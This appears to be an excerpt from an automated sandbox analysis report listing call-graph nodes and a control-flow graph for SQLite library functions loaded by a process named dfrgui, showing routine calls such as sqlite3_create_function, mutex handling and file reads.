26734->26737 26738 61e89712 26735->26738 26735->26741 26736 61e890d5 26736->26728 26740 61e890df sqlite3_create_function 26736->26740 26737->26741 26742 61e89493 26737->26742 26899 61e262e4 14 API calls 26738->26899 26740->26728 26746 61e89129 sqlite3_create_function 26740->26746 26741->26733 26747 61e897c0 26741->26747 26752 61e8977c sqlite3_create_function 26741->26752 26895 61e1a2a6 8 API calls 26742->26895 26743 61e893b0 sqlite3_mutex_enter 26743->26765 26745 61e8986c sqlite3_wal_autocheckpoint 26745->26701 26746->26728 26751 61e8916f sqlite3_create_function 26746->26751 26754 61e89814 26747->26754 26759 61e897d0 sqlite3_create_function 26747->26759 26749 61e893d5 sqlite3_mutex_leave 26755 61e89423 sqlite3_free 26749->26755 26749->26765 26750 61e89732 26750->26741 26900 61e262e4 14 API calls 26750->26900 26751->26728 26756 61e891b9 26751->26756 26752->26741 26753 61e894cc 26757 61e898ca 26753->26757 26896 61e1a2a6 8 API calls 26753->26896 26754->26733 26767 61e8981f sqlite3_create_module 26754->26767 26760 61e89437 26755->26760 26755->26765 26764 61e891d3 sqlite3_create_function 26756->26764 26775 61e89217 26756->26775 26902 61e09d5d sqlite3_free sqlite3_free sqlite3_free 26757->26902 26759->26747 26760->26730 26762 61e894ec 26762->26757 26897 61e1a2a6 8 API calls 26762->26897 26764->26756 26765->26728 26765->26730 26765->26743 26765->26749 26765->26755 26894 61e29799 11 API calls 26765->26894 26766 61e898d9 sqlite3_free 26766->26726 26767->26754 26770 61e8950c 26770->26757 26771 61e89514 sqlite3_create_function 26770->26771 26771->26757 26772 61e8955a sqlite3_create_function 26771->26772 26772->26757 26773 61e895a0 sqlite3_overload_function 26772->26773 26773->26757 26774 61e895c2 sqlite3_overload_function 26773->26774 26774->26757 26777 61e895e4 sqlite3_overload_function 26774->26777 26775->26728 26893 61e262e4 14 API calls 26775->26893 26777->26757 26779 61e89606 sqlite3_overload_function 26777->26779 26778 61e892e3 26778->26728 26780 61e892ed sqlite3_create_function 26778->26780 26779->26757 26781 61e89628 sqlite3_overload_function 26779->26781 26780->26726 26782 61e89336 sqlite3_create_function 26780->26782 26781->26757 26783 61e8964a 26781->26783 26782->26765 26898 61e262e4 14 API calls 26783->26898 26785 61e89666 26785->26726 26901 61e262e4 14 API calls 26785->26901 26787 61e8989d 26787->26726 26788 61e898a7 sqlite3_create_module 26787->26788 26788->26726 26789->26672 26903 61e0ff10 26790->26903 26794 61e29cfc 26793->26794 26795 61e11eea 11 API calls 26794->26795 26796 61e29d25 26795->26796 26799 61e29d89 26796->26799 26801 61e29d2b 26796->26801 26797 61e11eea 11 API calls 26798 61e29d3e 26797->26798 26798->26690 26917 61e29799 11 API calls 26799->26917 26801->26797 26803 61e11f78 26802->26803 26804 61e11efd 26802->26804 26803->26704 26803->26705 26804->26803 26918 61e11265 10 API calls 26804->26918 26806 61e11f62 26806->26803 26919 61e0f503 sqlite3_free 26806->26919 26809 61e43f30 strcmp 26808->26809 26810 61e43f5a 26808->26810 26809->26810 26843 61e44276 26809->26843 26811 61e12104 6 API calls 26810->26811 26810->26843 26822 61e43fba 26811->26822 26812 61e12104 6 API calls 26813 61e44443 26812->26813 26815 61e44449 26813->26815 26816 61e4445b 26813->26816 26814 61e44bc5 26814->26714 26870 61e12e95 26814->26870 26939 61e0f503 sqlite3_free 26815->26939 26819 61e44562 26816->26819 26940 61e0f503 sqlite3_free 26816->26940 26817 61e441fa 26821 61e12104 6 API calls 26817->26821 26820 61e4462b 26819->26820 26920 61e01608 26819->26920 26923 61e13ef4 26820->26923 26832 61e44212 26821->26832 26822->26814 26822->26817 26829 61e0ff10 6 API calls 26822->26829 26824 61e44a5b 26827 61e44a60 sqlite3_free sqlite3_free 26824->26827 26865 61e44a17 26827->26865 26828 61e44456 26828->26827 26942 61e43e28 91 API calls 26828->26942 26831 61e4404d 26829->26831 26833 61e44075 26831->26833 26834 61e44063 sqlite3_free 26831->26834 26832->26824 26841 61e0ff10 6 API calls 26832->26841 26832->26843 26836 61e4407e 26833->26836 26845 61e440af sqlite3_free sqlite3_free 26833->26845 26834->26814 26835 61e44abb sqlite3_mutex_leave 26835->26814 26846 61e440e0 sqlite3_mutex_enter 26836->26846 26837 61e445b7 26838 61e4468e 26837->26838 26839 61e44602 sqlite3_uri_boolean 26837->26839 26850 61e443b6 26838->26850 26941 61e0a946 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 26838->26941 26839->26820 26842 61e44631 sqlite3_uri_boolean 26839->26842 26863 61e442de 26841->26863 26842->26820 26843->26812 26843->26828 26844 61e4472f sqlite3_free 26844->26850 26845->26814 26935 61e01704 26846->26935 26849 61e44107 26851 61e441dd sqlite3_mutex_leave sqlite3_free 26849->26851 26852 61e4411a strcmp 26849->26852 26857 61e4414a 26849->26857 26850->26828 26854 61e44851 26850->26854 26932 61e014e3 26850->26932 26851->26817 26868 61e44971 26851->26868 26852->26849 26854->26828 26858 61e13ef4 15 API calls 26854->26858 26869 61e44b24 26854->26869 26855 61e12e95 3 API calls 26855->26865 26856 61e441bb 26856->26851 26857->26856 26861 61e4417f sqlite3_mutex_leave sqlite3_mutex_leave sqlite3_free sqlite3_free 26857->26861 26862 61e44936 26858->26862 26859 61e443a9 26938 61e0f503 sqlite3_free 26859->26938 26861->26814 26862->26828 26862->26868 26862->26869 26863->26828 26863->26843 26863->26859 26937 61e28f47 sqlite3_log 26863->26937 26865->26814 26865->26835 26866 61e44397 26866->26843 26866->26859 26867 61e44b67 sqlite3_mutex_enter sqlite3_mutex_leave 26867->26869 26868->26855 26869->26828 26869->26867 26871 61e12ead 26870->26871 26872 61e12e9e 26870->26872 26871->26717 26872->26871 26873 61e12e22 sqlite3_mutex_try 26872->26873 26874 61e12e3e 26873->26874 26876 61e12e4c 26873->26876 26874->26717 26875 61e12e72 sqlite3_mutex_enter 26877 61e12e65 26875->26877 26876->26875 27011 61e02bdf sqlite3_mutex_leave 26876->27011 26877->26874 26877->26875 26880 61e150bf 26879->26880 26882 61e150cb 26879->26882 26881 61e12e95 3 API calls 26880->26881 26881->26882 26882->26719 26884 61e13431 26883->26884 26885 61e13470 sqlite3_free 26884->26885 26886 61e1347e 26884->26886 26888 61e134b0 26884->26888 26885->26886 26887 61e0ff10 6 API calls 26886->26887 26886->26888 26887->26888 26888->26745 26889->26708 26890->26708 26891->26715 26892->26736 26893->26778 26894->26755 26895->26753 26896->26762 26897->26770 26898->26785 26899->26750 26900->26741 26901->26787 26902->26766 26904 61e0ff2c 26903->26904 26905 61e10000 26903->26905 26904->26905 26906 61e0ff47 sqlite3_mutex_enter 26904->26906 26905->26686 26908 61e0ff5d 26906->26908 26907 61e0ffef sqlite3_mutex_leave 26907->26905 26910 61e0ffb4 26908->26910 26916 61e09b3d sqlite3_mutex_leave sqlite3_mutex_enter 26908->26916 26913 61e27424 malloc 26910->26913 26911 61e0ffc9 26911->26907 26914 61e2744a sqlite3_log 26913->26914 26915 61e2743d 26913->26915 26914->26915 26915->26911 26916->26910 26917->26798 26918->26806 26919->26803 26943 61e3a09f 26920->26943 26926 61e13f0b 26923->26926 26924 61e13fc2 26924->26838 26926->26924 26927 61e13f6c 26926->26927 26986 61e13e1c 26926->26986 26998 61e0a946 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 26927->26998 26928 61e13f66 26928->26927 26930 61e13fb7 26928->26930 26997 61e0a946 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 26930->26997 26999 61e27230 26932->26999 26936 61e0170d sqlite3_mutex_enter 26935->26936 26936->26849 26937->26866 26938->26850 26939->26828 26940->26819 26941->26844 26942->26824 26944 61e3a0df 26943->26944 26945 61e3a0ed 26943->26945 26985 61e39db8 30 API calls 26944->26985 26949 61e01631 26945->26949 26981 61e17674 26945->26981 26948 61e3a105 26950 61e3a121 26948->26950 26951 61e3a10c sqlite3_free 26948->26951 26949->26837 26952 61e3a144 sqlite3_win32_is_nt 26950->26952 26953 61e3a12b 26950->26953 26951->26949 26952->26953 26954 61e3a14d 26952->26954 26953->26954 26955 61e17525 sqlite3_win32_sleep 26953->26955 26956 61e3a1be 26953->26956 26954->26956 26957 61e3a19e sqlite3_free sqlite3_free 26954->26957 26955->26953 26958 61e3a236 CreateFileW 26956->26958 26959 61e3a229 sqlite3_win32_is_nt 26956->26959 26957->26949 26960 61e3a2cc 26958->26960 26961 61e3a27d 26958->26961 26959->26958 26971 61e3a2d4 26959->26971 26962 61e26d50 sqlite3_log 26960->26962 26961->26958 26961->26960 26963 61e26d8f 20 API calls 26961->26963 26964 61e17525 sqlite3_win32_sleep 26961->26964 26965 61e3a371 26962->26965 26963->26961 26964->26961 26966 61e3a37a sqlite3_free sqlite3_free 26965->26966 26967 61e3a3fc sqlite3_free sqlite3_free 26965->26967 26969 61e3a396 26966->26969 26970 61e3a3c8 26966->26970 26973 61e3a43b sqlite3_uri_boolean 26967->26973 26969->26970 26974 61e3a39c 26969->26974 26976 61e2640a 14 API calls 26970->26976 26971->26960 26972 61e26d8f 20 API calls 26971->26972 26975 61e17525 sqlite3_win32_sleep 26971->26975 26972->26971 26973->26949 26979 61e3a09f 37 API calls 26974->26979 26975->26971 26977 61e3a3eb 26976->26977 26980 61e28f47 sqlite3_log 26977->26980 26979->26949 26980->26949 26982 61e17685 26981->26982 26983 61e1768f sqlite3_win32_is_nt 26981->26983 26982->26983 26983->26982 26984 61e17698 26983->26984 26985->26945 26987 61e13e42 sqlite3_mutex_enter 26986->26987 26988 61e13e2f 26986->26988 26990 61e13e99 sqlite3_mutex_leave 26987->26990 26991 61e13e59 26987->26991 26989 61e0ff10 6 API calls 26988->26989 26992 61e13e37 26989->26992 26990->26988 26993 61e13e3d 26990->26993 26991->26990 26992->26993 26994 61e13eb4 sqlite3_mutex_enter 26992->26994 26993->26928 26995 61e13ecb 26994->26995 26996 61e13edd sqlite3_mutex_leave 26995->26996 26996->26993 26997->26924 26998->26924 27003 61e2725a 26999->27003 27000 61e272c4 ReadFile 27001 61e272ed 27000->27001 27000->27003 27008 61e26d50 sqlite3_log 27001->27008 27003->27000 27003->27001 27004 61e0150a 27003->27004 27006 61e27320 27003->27006 27009 61e17525 sqlite3_win32_sleep 27003->27009 27004->26854 27010 61e2640a 14 API calls 27006->27010 27008->27004 27009->27003 27010->27004 27011->26876 27012 61e18064 GetSystemInfo sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register 27013 61e17c24 27014 61e17f5f 27013->27014 27015 61e17c33 27013->27015 27015->27014 27016 61e17c55 sqlite3_mutex_enter 27015->27016 27017 61e17c77 27016->27017 27023 61e17c94 27016->27023 27019 61e17c80 sqlite3_config 27017->27019 27017->27023 27018 61e17d41 sqlite3_mutex_leave sqlite3_mutex_enter 27020 61e17f00 sqlite3_mutex_leave sqlite3_mutex_enter 27018->27020 27026 61e17d6c 27018->27026 27019->27023 27021 61e17f27 sqlite3_mutex_free 27020->27021 27022 61e17f3e sqlite3_mutex_leave 27020->27022 27021->27022 27022->27014 27023->27018 27024 61e17cf9 sqlite3_mutex_leave 27023->27024 27024->27014 27026->27020 27027 61e17dc9 sqlite3_malloc 27026->27027 27029 61e17df6 sqlite3_config 27026->27029 27030 61e17e0a 27026->27030 27028 61e17e24 sqlite3_free sqlite3_os_init 27027->27028 27031 61e17de8 27027->27031 27028->27031 27029->27030 27030->27027 27030->27031 27031->27020 27032 61e7618e sqlite3_mutex_enter 27033 61e761ea 27032->27033 27049 61e762cd 27033->27049 27055 61e0f503 sqlite3_free 27033->27055 27035 61e763c7 27093 61e0f503 sqlite3_free 27035->27093 27037 61e76233 27056 61e12eaf sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 27037->27056 27038 61e763d4 27094 61e29799 11 API calls 27038->27094 27040 61e76244 27057 61e5ee52 27040->27057 27043 61e76696 27095 61e0f503 sqlite3_free 27043->27095 27046 61e7629a 27046->27049 27091 61e0f503 sqlite3_free 27046->27091 27047 61e766a3 27096 61e11784 sqlite3_free sqlite3_free 27047->27096 27049->27035 27049->27038 27092 61e52701 124 API calls 27049->27092 27050 61e766ae 27054 61e766bb sqlite3_mutex_leave 27050->27054 27055->27037 27056->27040 27097 61e5e9c5 27057->27097 27060 61e5ef41 27060->27046 27060->27049 27090 61e29fa9 9 API calls 27060->27090 27062 61e5ee81 27062->27060 27102 61e03ed3 sqlite3_stricmp sqlite3_stricmp 27062->27102 27064 61e5eeac 27067 61e5eec8 sqlite3_strnicmp 27064->27067 27074 61e5ef25 27064->27074 27089 61e5ef95 27064->27089 27065 61e5f055 27112 61e29fa9 9 API calls 27065->27112 27066 61e5f07c 27113 61e29fa9 9 API calls 27066->27113 27070 61e5eeeb 27067->27070 27067->27089 27103 61e0463f sqlite3_stricmp 27070->27103 27072 61e5eef6 27072->27089 27104 61e128e4 11 API calls 27072->27104 27074->27060 27075 61e5ef8c 27074->27075 27076 61e5ef9a 27074->27076 27074->27089 27105 61e0f503 sqlite3_free 27075->27105 27106 61e2186c 8 API calls 27076->27106 27079 61e5efc7 27107 61e2186c 8 API calls 27079->27107 27081 61e5efd2 27108 61e2186c 8 API calls 27081->27108 27083 61e5efe6 27109 61e2d8fa 11 API calls 27083->27109 27085 61e5f001 27085->27060 27110 61e29fa9 9 API calls 27085->27110 27087 61e5f023 27111 61e0f503 sqlite3_free 27087->27111 27089->27060 27089->27065 27089->27066 27090->27046 27091->27049 27092->27035 27093->27038 27094->27043 27095->27047 27096->27050 27098 61e5e9d7 27097->27098 27099 61e5e9df 27097->27099 27114 61e5e940 27098->27114 27099->27060 27101 61e03ddc sqlite3_stricmp 27099->27101 27101->27062 27102->27064 27103->27072 27104->27074 27105->27089 27106->27079 27107->27081 27108->27083 27109->27085 27110->27087 27111->27089 27112->27060 27113->27060 27115 61e5e976 27114->27115 27118 61e5e969 27114->27118 27120 61e5e64d 27115->27120 27117 61e5e986 27117->27099 27118->27117 27119 61e5e64d 116 API calls 27118->27119 27119->27118 27149 61e6bc76 27120->27149 27123 61e12e95 3 API calls 27125 61e5e6fc 27123->27125 27126 61e5e739 27125->27126 27167 61e3d45e 27125->27167 27135 61e5e758 27126->27135 27184 61e131ff sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 27126->27184 27129 61e5e713 27129->27126 27130 61e5e720 27129->27130 27183 61e111a1 sqlite3_free 27130->27183 27132 61e5e7e7 27186 61e111a1 sqlite3_free 27132->27186 27133 61e5e7c8 27133->27132 27136 61e5e80c 27133->27136 27135->27132 27135->27133 27185 61e13631 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 27135->27185 27187 61e2d856 9 API calls 27136->27187 27138 61e5e731 27148 61e5e6ea 27138->27148 27192 61e11e95 sqlite3_free sqlite3_free sqlite3_free sqlite3_free 27138->27192 27141 61e5e83f sqlite3_exec 27188 61e0f503 sqlite3_free 27141->27188 27143 61e5e895 27144 61e5e8a3 27143->27144 27189 61e5e573 11 API calls 27143->27189 27146 61e5e7f6 27144->27146 27190 61e12f5e 7 API calls 27144->27190 27146->27138 27146->27148 27191 61e42d7b 97 API calls 27146->27191 27148->27118 27150 61e6bcb6 27149->27150 27151 61e6bca0 27149->27151 27153 61e5e6c6 27150->27153 27154 61e6bcc4 27150->27154 27155 61e6bccd sqlite3_strnicmp 27150->27155 27193 61e2d86c 10 API calls 27151->27193 27153->27123 27153->27138 27153->27148 27195 61e2d86c 10 API calls 27154->27195 27156 61e6bda2 27155->27156 27157 61e6bd01 27155->27157 27156->27154 27164 61e6bdc4 27156->27164 27159 61e6bd18 sqlite3_prepare 27157->27159 27160 61e6bd95 sqlite3_finalize 27159->27160 27161 61e6bd5b 27159->27161 27160->27153 27161->27160 27162 61e6bd6f 27161->27162 27163 61e6bd81 sqlite3_errmsg 27161->27163 27162->27160 27194 61e2d86c 10 API calls 27163->27194 27164->27153 27196 61e2d86c 10 API calls 27164->27196 27168 61e12e95 3 API calls 27167->27168 27176 61e3d475 27168->27176 27169 61e3d9df 27169->27129 27173 61e3d913 27173->27169 27225 61e1241d 9 API calls 27173->27225 27174 61e3d579 memcmp 27174->27176 27175 61e3d5b7 memcmp 27175->27176 27176->27173 27176->27174 27176->27175 27177 61e3d841 memcmp 27176->27177 27178 61e3d633 memcmp 27176->27178 27182 61e13ef4 15 API calls 27176->27182 27197 61e3c53c 27176->27197 27219 61e02fba 27176->27219 27222 61e8b455 50 API calls 27176->27222 27223 61e0af1f sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 27176->27223 27224 61e274a8 sqlite3_log 27176->27224 27177->27176 27178->27176 27182->27176 27183->27138 27185->27133 27186->27146 27187->27141 27188->27143 27189->27144 27191->27138 27192->27148 27193->27153 27194->27160 27195->27153 27196->27153 27198 61e3c8a1 27197->27198 27206 61e3c554 27197->27206 27200 61e3c7d2 27198->27200 27229 61e3377e 28 API calls 27198->27229 27199 61e3c953 27199->27176 27200->27199 27230 61e12a78 sqlite3_free sqlite3_free 27200->27230 27203 61e3c844 27203->27198 27228 61e8b455 50 API calls 27203->27228 27204 61e3c65f 27204->27200 27204->27203 27205 61e014e3 17 API calls 27204->27205 27207 61e3c80b 27205->27207 27206->27200 27206->27204 27210 61e3c57a 27206->27210 27214 61e01608 48 API calls 27206->27214 27217 61e3c611 27206->27217 27207->27200 27208 61e3c826 memcmp 27207->27208 27208->27203 27209 61e3c785 27209->27200 27209->27204 27227 61e3b940 73 API calls 27209->27227 27210->27200 27210->27204 27210->27209 27212 61e01608 48 API calls 27210->27212 27213 61e3c76f 27212->27213 27213->27209 27226 61e28f47 sqlite3_log 27213->27226 27214->27217 27216 61e014e3 17 API calls 27216->27210 27217->27204 27217->27210 27217->27216 27231 61e029a2 27219->27231 27221 61e02fda 27221->27176 27222->27176 27223->27176 27224->27176 27225->27169 27226->27209 27227->27204 27228->27198 27229->27198 27230->27199 27234 61e3bf27 27231->27234 27232 61e029c1 27232->27221 27235 61e3bf46 27234->27235 27236 61e3c050 27235->27236 27238 61e3c061 27235->27238 27240 61e3c030 27235->27240 27243 61e3c05a 27235->27243 27258 61e274a8 sqlite3_log 27236->27258 27241 61e3c077 27238->27241 27242 61e3c0b6 27238->27242 27240->27232 27241->27243 27245 61e3c07f 27241->27245 27249 61e32fea 27242->27249 27243->27240 27261 61e3bee3 73 API calls 27243->27261 27245->27240 27246 61e3c097 27245->27246 27259 61e12761 7 API calls 27245->27259 27260 61e128a4 7 API calls 27246->27260 27250 61e33077 27249->27250 27251 61e33009 27249->27251 27262 61e32edd 8 API calls 27250->27262 27252 61e33013 27251->27252 27253 61e3308a 27251->27253 27257 61e33075 27251->27257 27256 61e014e3 17 API calls 27252->27256 27255 61e014e3 17 API calls 27253->27255 27255->27257 27256->27257 27257->27243 27258->27243 27259->27246 27260->27240 27262->27251 27263 61e2e71e 27264 61e2e74d 27263->27264 27266 61e2e737 27263->27266 27265 61e2a271 9 API calls 27265->27266 27266->27264 27266->27265 27268 61e2a317 9 API calls 27266->27268 27269 61e2e5f0 15 API calls 27266->27269 27270 61e2ea40 27266->27270 27271 61e2ea87 27266->27271 27272 61e2e922 27266->27272 27268->27266 27269->27266 27270->27272 27274 61e2ea50 27270->27274 27271->27264 27271->27272 27281 61e2eab3 27271->27281 27283 61e29fa9 9 API calls 27272->27283 27274->27264 27289 61e29fa9 9 API calls 27274->27289 27275 61e2eb76 27284 61e29fa9 9 API calls 27275->27284 27279 61e1171f sqlite3_free sqlite3_free 27279->27281 27281->27264 27281->27274 27281->27275 27281->27279 27285 61e139ea 7 API calls 27281->27285 27286 61e2a271 9 API calls 27281->27286 27287 61e2e31a 15 API calls 27281->27287 27288 61e10b8e 6 API calls 27281->27288 27283->27264 27284->27264 27285->27281 27286->27281 27287->27281 27288->27281 27289->27264

                                  Executed Functions

                                  Function 61E88C84 Relevance: 97.0, APIs: 38, Strings: 17, Instructions: 750COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 61e88c84-61e88cb1 sqlite3_initialize 1 61e8993f-61e89946 0->1 2 61e88cb7-61e88cc3 0->2 3 61e88cdb-61e88ce0 2->3 4 61e88cc5-61e88cc8 2->4 6 61e88ce9-61e88cf0 3->6 7 61e88ce2-61e88ce7 3->7 4->3 5 61e88cca-61e88cd4 4->5 5->3 9 61e88cfa-61e88d11 call 61e12104 6->9 10 61e88cf2 6->10 8 61e88cf7 7->8 8->9 13 61e898e9 9->13 14 61e88d17-61e88d19 9->14 10->8 17 61e898eb-61e898f8 sqlite3_errcode 13->17 15 61e88d39-61e88eca sqlite3_mutex_enter call 61e29cc5 * 5 14->15 16 61e88d1b-61e88d2a call 61e01704 14->16 35 61e89928-61e89933 sqlite3_mutex_leave 15->35 36 61e88ed0-61e88efc call 61e11eea 15->36 16->15 26 61e88d2c-61e88d34 sqlite3_free 16->26 20 61e898fa-61e89904 sqlite3_close 17->20 21 61e89906-61e89908 17->21 24 61e89911-61e89926 sqlite3_free 20->24 21->24 25 61e8990a 21->25 24->1 25->24 26->13 35->17 39 61e88f0a-61e88f24 call 61e36656 36->39 40 61e88efe-61e88f08 call 61e26168 36->40 44 61e88f29-61e88f2d 39->44 40->44 45 61e88f2f-61e88f32 44->45 46 61e88f71-61e88f9a call 61e43f0e 44->46 48 61e88f3b-61e88f6c call 61e29799 sqlite3_free 45->48 49 61e88f34-61e88f36 call 61e0a424 45->49 53 61e88f9c-61e88fb2 call 61e16c95 46->53 54 61e88fb7-61e88fd9 call 61e12e95 call 61e150b0 46->54 48->35 49->48 53->35 62 61e88fdb-61e88fe1 54->62 63 61e88fe4-61e89021 call 61e0ae57 call 61e150b0 54->63 62->63 63->35 68 61e89027-61e8904b call 61e16c95 sqlite3_overload_function 63->68 71 61e8904d-61e8904f call 61e0a424 68->71 72 61e89054-61e89062 sqlite3_errcode 68->72 71->72 74 61e89068-61e8906a 72->74 75 61e89377-61e89379 72->75 76 61e89670-61e89674 74->76 77 61e89070-61e89084 sqlite3_malloc 74->77 78 61e8943c-61e89440 75->78 79 61e8937f-61e89386 75->79 80 61e8975a-61e8975e 76->80 81 61e8967a-61e8967c 76->81 82 61e8908a-61e890d9 call 61e262e4 77->82 83 61e89935-61e8993a 77->83 78->76 86 61e89446-61e89448 78->86 84 61e89388-61e89394 sqlite3_errcode 79->84 85 61e8939f-61e893a4 79->85 90 61e8984a-61e8984c 80->90 91 61e89764-61e89766 80->91 81->80 87 61e89682-61e896c6 sqlite3_create_function 81->87 82->78 104 61e890df-61e89123 sqlite3_create_function 82->104 83->76 84->35 89 61e8939a 84->89 93 61e893a6-61e893c4 call 61e01704 sqlite3_mutex_enter 85->93 86->76 92 61e8944e-61e89472 sqlite3_create_module 86->92 87->80 94 61e896cc-61e89710 sqlite3_create_function 87->94 89->78 95 61e8984e-61e89850 call 61e16c95 90->95 96 61e89855-61e89867 call 61e1341e 90->96 91->95 98 61e8976c-61e89771 91->98 92->76 99 61e89478-61e8948d sqlite3_malloc 92->99 114 61e893d1-61e893d3 93->114 115 61e893c6-61e893cf 93->115 94->80 101 61e89712-61e89736 call 61e262e4 94->101 95->96 109 61e8986c-61e8987c sqlite3_wal_autocheckpoint 96->109 105 61e89773-61e89776 98->105 99->80 106 61e89493-61e894ce call 61e1a2a6 99->106 101->80 126 61e89738-61e89758 call 61e262e4 101->126 104->78 110 61e89129-61e89169 sqlite3_create_function 104->110 111 61e89778-61e8977a 105->111 112 61e897c0-61e897c5 105->112 128 61e898ca 106->128 129 61e894d4-61e894ee call 61e1a2a6 106->129 109->35 110->78 119 61e8916f-61e891b3 sqlite3_create_function 110->119 111->112 120 61e8977c-61e897be sqlite3_create_function 111->120 116 61e897c7-61e897ca 112->116 117 61e893d5-61e893ec sqlite3_mutex_leave 114->117 115->117 122 61e897cc-61e897ce 116->122 123 61e89814 116->123 124 61e893ee-61e89404 117->124 125 61e89423-61e89431 sqlite3_free 117->125 119->78 127 61e891b9-61e891c8 119->127 120->105 122->123 131 61e897d0-61e89812 sqlite3_create_function 122->131 133 61e89816-61e89819 123->133 124->125 147 61e89406-61e8941e call 61e29799 124->147 125->93 134 61e89437 125->134 126->80 136 61e891ca-61e891cc 127->136 132 61e898cf-61e898e4 call 61e09d5d sqlite3_free 128->132 129->128 145 61e894f4-61e8950e call 61e1a2a6 129->145 131->116 132->76 133->90 142 61e8981b-61e8981d 133->142 134->84 137 61e891ce-61e891d1 136->137 138 61e89217-61e89219 136->138 137->138 144 61e891d3-61e89215 sqlite3_create_function 137->144 138->78 146 61e8921f-61e89231 138->146 142->90 149 61e8981f-61e89848 sqlite3_create_module 142->149 144->136 145->128 156 61e89514-61e89554 sqlite3_create_function 145->156 151 61e89233-61e89235 146->151 147->125 149->133 154 61e89269-61e8926b 151->154 155 61e89237-61e8923a 151->155 154->78 158 61e89271-61e89283 154->158 155->154 157 61e8923c-61e89267 155->157 156->132 159 61e8955a-61e8959a sqlite3_create_function 156->159 157->151 160 61e89285-61e89287 158->160 159->132 161 61e895a0-61e895bc sqlite3_overload_function 159->161 163 61e89289-61e8928c 160->163 164 61e892bc-61e892be 160->164 161->132 166 61e895c2-61e895de sqlite3_overload_function 161->166 163->164 167 61e8928e-61e892ba 163->167 164->78 165 61e892c4-61e892e7 call 61e262e4 164->165 165->78 173 61e892ed-61e89330 sqlite3_create_function 165->173 166->132 169 61e895e4-61e89600 sqlite3_overload_function 166->169 167->160 169->132 171 61e89606-61e89622 sqlite3_overload_function 169->171 171->132 174 61e89628-61e89644 sqlite3_overload_function 171->174 173->76 175 61e89336-61e89375 sqlite3_create_function 173->175 174->132 176 61e8964a-61e8966a call 61e262e4 174->176 175->75 176->76 179 61e89881-61e898a1 call 61e262e4 176->179 179->76 182 61e898a7-61e898c5 sqlite3_create_module 179->182 182->76
                                  APIs
                                  • sqlite3_initialize.SQLITE3 ref: 61E88CAA
                                    • Part of subcall function 61E17C24: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17C5B
                                    • Part of subcall function 61E17C24: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21F32), ref: 61E17C8F
                                    • Part of subcall function 61E17C24: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17F58
                                  • sqlite3_free.SQLITE3 ref: 61E88D2F
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E88D44
                                    • Part of subcall function 61E36656: memcmp.MSVCRT ref: 61E366A4
                                    • Part of subcall function 61E36656: sqlite3_malloc64.SQLITE3 ref: 61E366D8
                                  • sqlite3_create_function.SQLITE3 ref: 61E896BD
                                  • sqlite3_create_function.SQLITE3 ref: 61E89707
                                  • sqlite3_create_function.SQLITE3 ref: 61E897B7
                                  • sqlite3_create_function.SQLITE3 ref: 61E8980B
                                  • sqlite3_free.SQLITE3 ref: 61E88F67
                                    • Part of subcall function 61E09B73: sqlite3_mutex_enter.SQLITE3 ref: 61E09B92
                                  • sqlite3_errcode.SQLITE3 ref: 61E898EE
                                  • sqlite3_close.SQLITE3 ref: 61E898FF
                                  • sqlite3_free.SQLITE3 ref: 61E8991C
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E8992E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_create_function$sqlite3_freesqlite3_mutex_enter$sqlite3_mutex_leave$memcmpsqlite3_closesqlite3_configsqlite3_errcodesqlite3_initializesqlite3_malloc64
                                  • String ID: $_a$@aa$BINARY$NOCASE$RTRIM$`da$`oa$`ra$fts3$fts4$fts5$fts5vocab$porter$rtree$rtree_i32$simple$unicode61
                                  • API String ID: 1097977795-871400363
                                  • Opcode ID: 6e224643fa61319ebba5d75974d8b4398b4caa1bbaba08a225ae2a84db6f9fb3
                                  • Instruction ID: 82301ecd81dbb0fa4ab917115afb57dba709f87d53d2a226ae9edcc09d219064
                                  • Opcode Fuzzy Hash: 6e224643fa61319ebba5d75974d8b4398b4caa1bbaba08a225ae2a84db6f9fb3
                                  • Instruction Fuzzy Hash: 3E62F4B0A087428FE740DF69C49574ABBF1BFC5308F25C82DE8998B395D779D8458B82
                                  Function 61E18064 Relevance: 7.5, APIs: 5, Instructions: 28COMMON
                                  Download Yara Rule

